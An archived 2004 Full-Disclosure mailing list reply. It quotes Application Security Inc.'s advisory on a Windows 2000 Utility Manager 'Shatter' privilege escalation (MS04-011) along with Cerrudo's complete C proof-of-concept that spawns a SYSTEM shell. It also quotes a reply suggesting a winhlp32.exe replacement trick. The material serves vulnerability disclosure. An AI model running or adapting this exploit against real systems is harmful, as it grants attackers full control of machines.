lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <01d901c42810$3bc5c0e0$0201a8c0@globint.com.ar> From: secemf at yahoo.com.ar (Esteban Martínez Fayó) Subject: Norton AntiVirus nested file manual scan bypass..... ----- Original Message ----- From: "natch" <lists@...ch.net> To: <full-disclosure@...ts.netsys.com> Sent: Monday, April 19, 2004 1:49 PM Subject: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass..... > Nice, but the faster method is to copy \winnt\system32\cmd.exe to > \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1. You are wrong. A normal user cannot overwrite \winnt\winhlp32.exe with the default NTFS file permissions of Windows 2000. > When the command prompt comes up it has elevated privileges. From there > you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a > new account. > > No external program needed. The microsoft patch simply removes the > contextual help. > > - > natch > > Vivek Rathod (Application Security, Inc.) wrote: > > > Microsoft Windows Utility Manager Vulnerability > > > > April 13, 2004 > > > > Risk Level: High > > > > Summary: > > A local elevation of privileges vulnerability exists on the Windows > > Utility > > Manager that allows to any user to take complete control over the > > operating > > system. > > > > Versions Affected: > > All products in the Windows 2000 operating system family. > > > > Details: > > Microsoft Windows 2000 contains support for Accessibility options > > within the > > operating system. Accessibility support is a series of assistive > > technologies > > within Windows that allow users with disabilities to still be able to > > access the > > functions of the operating system. Accessibility support is enabled or > > disabled > > through shortcuts built into the operating system, or through the > > Accessibility > > Utility Manager. The Utility Manager is an accessibility utility that > > allows > > users to check the status of Accessibility programs (Magnifier, > > Narrator, On- > > Screen Keyboard) and start or stop them. The Utility Manager can be > > invoked by > > pressing Windows Key + U or executing "utilman.exe /start" from the > > command > > line. The Utility Manager Service is enabled by default and runs in the > > interactive desktop with Local System privileges. > > > > The Utility Manager has support for context sensitive help. Users can > > access > > this by clicking in the "?" on the title bar and then on an object or by > > pressing the F1 key after selecting an object. In order to display the > > help, > > Utility Manager loads winhlp32.exe but does not drop System privileges. > > Therefore, winhlp32.exe is executed under the Local System account. While > > winhlp32.exe is executing it is possible to send Windows messages to > > it and > > attack it with "Shatter" style attacks. > > > > Winhlp32.exe is executed with its main window hidden but it is very > > trivial to > > make it visible. Once the window is made visible, a typical attack would > > involve using the ?File Open? dialog to execute a program such as > > ?cmd.exe.? > > Since the Help window has Local System privileges, the executed > > program will > > have the same privileges. > > > > Further information is available at: > > http://www.appsecinc.com/resources/alerts/general/04-0001.html > > http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908 > > http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx > > > > Fix: > > http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en > > > > > > Acknowledgments: > > Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application > > Security, Inc. (http://www.appsecinc.com) and to > > Brett Moore of Security-Assessment.com (http://security-assessment.com). > > > > Please find the proof-of-concept exploit code attached > > > > ___________________________________________ > > AppSecInc Team SHATTER > > Tel: 1-866-927-7732 > > E-mail: shatter@...secinc.com > > Web: www.appsecinc.com > > > > Application Security, Inc. > > "Securing Business by Securing Enterprise Applications" > > > > ------------------------------------------------------------------------ > > > > // By Cesar Cerrudo (cesar@...secinc.com) > > // Local elevation of priviliges exploit for Windows Utility Manager > > // Gives you a shell with system privileges > > // If you have problems try changing Sleep() values. > > > > #include <stdio.h> #include <windows.h> #include <commctrl.h> > > #include <Winuser.h> > > > > int main(int argc, char *argv[]) { HWND lHandle, lHandle2; > > POINT point; > > > > char sText[]="%windir%\\system32\\cmd.ex?"; > > > > // run utility manager > > system("utilman.exe /start"); > > Sleep(500); > > > > // execute contextual help > > SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0); > > Sleep(500); > > > > // open file open dialog windown in Windows Help > > PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0); > > Sleep(500); > > > > // find open file dialog window > > lHandle = FindWindow("#32770","Open"); > > > > // get input box handle > > lHandle2 = GetDlgItem(lHandle, 0x47C); > > Sleep(500); > > > > // set text to filter listview to display only cmd.exe > > SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText); > > Sleep(800); > > > > // send return > > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0); > > > > //get navigation bar handle > > lHandle2 = GetDlgItem(lHandle, 0x4A0); > > //send tab > > SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0); > > Sleep(500); > > lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL); > > //get list view handle > > lHandle2 = GetDlgItem(lHandle2, 0x1); > > > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char > > SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char > > Sleep(500); > > > > // popup context menu > > PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0); > > Sleep(1000); > > > > // get context menu handle > > point.x =10; point.y =30; > > lHandle2=WindowFromPoint(point); > > > > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu > > SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu > > SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return > > > > SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window > > > > return(0); > > } > > > > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists